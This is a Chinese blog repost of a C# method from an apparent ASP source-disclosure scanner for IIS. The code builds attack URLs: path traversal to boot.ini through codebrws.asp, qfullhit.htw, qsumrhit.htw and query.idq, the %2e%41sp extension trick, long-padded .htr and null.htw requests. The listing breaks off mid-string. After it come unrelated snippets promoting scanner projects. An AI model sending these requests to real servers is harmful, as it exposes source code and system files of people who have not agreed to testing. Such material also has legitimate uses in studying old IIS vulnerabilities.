导读:
//主要方法
protected void btnGo_Click (object sender, System.EventArgs e)
{
//解析url
string strServer = this.txtServer.Text ;
string strUrl = this.txtFileName.Text ;
char [] point = {'.'} ;//定义分割符为"."
char[] line = {'/'} ;//定义分割符为"."
string [] arrString = strUrl.Split(line) ;
//求asp文件全名
string strFileName = arrString[arrString.Length - 1] ;
//求从根目录下的路径
string strPath = strUrl.Substring( 0 ,
strUrl.Length - strFileName.Length) ;
//解析文件全名
arrString = strFileName.Split(point) ;
//求文件扩展名
string strLast = arrString[arrString.Length - 1] ;
//求文件名
string strFirst = strFileName.Substring( 0 ,
strFileName.Length - strLast.Length - 1) ;
//使按钮、输入框等失效
this.txtServer.ReadOnly = true ;
this.txtFileName.ReadOnly = true ;
this.btnClear.Enabled = false ;
this.btnGo.Enabled = false ;
if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""
|| this.txtServer.Text.Trim()== "" ||
this.txtServer.Text.Substring(0,7) != "http://")
{
MessageBox.Show("请输入正确的主机名和文件名!") ;
this.txtServer.Focus() ;
}
else
{
this.txtResult.Visible = true ;
this.txtResult.ReadOnly = true ;
this.barStatus.Text = "正在连结主机…" ;
string strRequestFile ;
switch (this.cboMethod.SelectedIndex)
{
case 0: //直接读取
strRequestFile = strServer + strUrl ;
break ;
case 5 : //%2e%41sp
strRequestFile = strServer + strPath + strFirst
+ "%2e%41sp" ;
break ;
case 8 : //longhtr
strRequestFile = strServer + strUrl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
break ;
case 10: //codebrws.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strUrl ;
break ;
case 11: //showcode.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/../../../../boot.ini" ;
break;
case 12 : //null.htw
strRequestFile = strServer + "/null.htw?CiWebHitsFile="
+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
break ;
case 13 : //qfullhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;
case 14 : //qsumrhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;
case 15 : //query.idq
strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%2
本文转自
http://study.qqcf.com/web/224/24048.htm
分享到:
相关推荐
总之,这个用C#编写的扫描ASP源码漏洞的应用程序展示了多种IT领域的关键技术,包括高级编程语言的使用、网络安全实践、以及GUI设计。通过对这些技术的深入理解和应用,开发人员可以构建出功能强大且用户友好的工具,...
根据给定的信息,我们可以推断出这是一个用于扫描ASP源代码中的漏洞的C#应用程序。下面将详细介绍相关的知识点。 ### 1. C#编程语言 C#(读作C Sharp)是一种面向对象、类型安全的编程语言,由微软开发并首次发布...
本压缩包中的资源是基于C#编写的用于扫描ASP源码漏洞的应用程序,这为开发者和安全从业者提供了一种工具,以检测和预防这些潜在的安全问题。 首先,我们要理解ASP应用的常见漏洞类型: 1. SQL注入:攻击者通过输入...
【多线程漏洞扫描器Asp.net源码】是一款针对Web应用程序进行安全检测的工具,其核心特性是利用多线程技术提高扫描效率。多线程技术允许程序同时执行多个任务,这在漏洞扫描器中至关重要,因为它可以快速地遍历目标...
虽然无法直接获取到实际代码,但可以给出一个简单的示例来说明如何使用C#语言进行端口扫描: ```csharp public static bool IsPortOpen(string host, int port) { try { using (var client = new TcpClient()) {...
一个典型的ASP.NET Web项目可能包含各种文件,如.aspx(页面)、.cs(C#后端代码)、.config(配置文件)以及.css和.js(样式和脚本)。测试这些源码时,我们需要关注以下几个方面: 1. 可用性:确保所有功能正常...
在“asp.net多线程的TCP端口扫描程序的设计与实现”这个毕业设计项目中,开发者使用ASP.NET技术构建了一个能够进行TCP端口扫描的程序。TCP端口扫描是网络安全领域中的常见操作,用于检测网络中目标主机开放的端口,...
本资源提供了一个全面且深入的计算机专业毕业设计项目,主题为“基于ASP.NET的多线程TCP端口扫描程序的设计与实现”。该项目通过结合ASP.NET技术和多线程编程,实现了对目标系统的TCP端口进行高效、准确的扫描。 **...
标题中的“感染htm jsp php asp aspx html的程序源代码”暗示了这是一个关于Web应用程序安全的主题,特别是关于恶意代码或病毒如何感染这些不同类型的Web文件。这可能是一个研究、教学材料,或者是讨论如何防止这类...
【ASPXspy2 测试安全性】是一个关注于Web应用程序安全性的主题,主要涉及到C#编程语言的源码分析。在ASP.NET环境中,开发者通常使用C#编写ASPX页面,这些页面构成了Web应用的核心部分。然而,如果不妥善处理,可能会...
【描述】中提到的"配置文件 web.config"是ASP.NET应用中的关键文件,它存储了应用程序的配置信息,如数据库连接字符串、身份验证设置、会话状态配置等。`web.config`文件通常包含敏感信息,因此在上传到服务器或共享...
代码审查(Code Review)作为软件开发过程中至关重要的一个环节,旨在提高代码质量、减少缺陷并促进团队协作。通常,这一过程涉及代码创作者与审查人员之间的互动,有时还包括质量保证(QA)测试人员的参与。审查...
本文将深入探讨“用户管理系统项目需求说明”所涵盖的关键知识点,并结合提供的标签“源码”和“工具”,来阐述在设计和实现这样一个系统时需要考虑的重要方面。 1. **用户管理**: - 用户注册与登录:系统应支持...